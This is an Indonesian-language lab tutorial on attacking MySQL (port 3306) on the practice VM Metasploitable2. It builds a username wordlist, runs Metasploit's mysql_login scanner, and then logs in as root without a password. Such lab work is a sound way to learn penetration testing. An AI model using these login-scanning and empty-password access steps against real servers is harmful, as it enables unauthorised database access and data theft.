Exploit Port 3306 (MySQL)
Buat file dengan nano yang berisi daftar user untuk uji coba
nano user-metasploitable2.txt
Isi file tersebut dengan daftar user sebagai berikut. Kemudian tekan Ctrl+o lalu enter untuk menyimpan
root
admin
msfadmin
administrator
guest
user
test
postgres
oracle
Buka msfconsole di terminal
Cari modul untuk exploit MySQL
Gunakan modul auxiliary/scanner/mysql/mysql_login yang berada di nomor urut 5 dari hasil pencarian
Tampilkan daftar parameter yang dibutuhkan di modul tersebut
Isi parameter yang dibutuhkan di modul tersebut
set rhosts < IP_metasploitable2>
set user_file /home/kali/user-metasploitable2.txt
Setelah pengisian parameter selesai jalankan modul tersebut. Disini didapat akses ke MySQL tanpa password dengan menggunakan user root
Lakukan uji coba koneksi ke MySQL dengan user root. Ternyata disini kita berhasil masuk tanpa dimintai password
mysql -u root -h < IP_metasploitable2>
Lihat semua database yang terdapat di MySQL Server
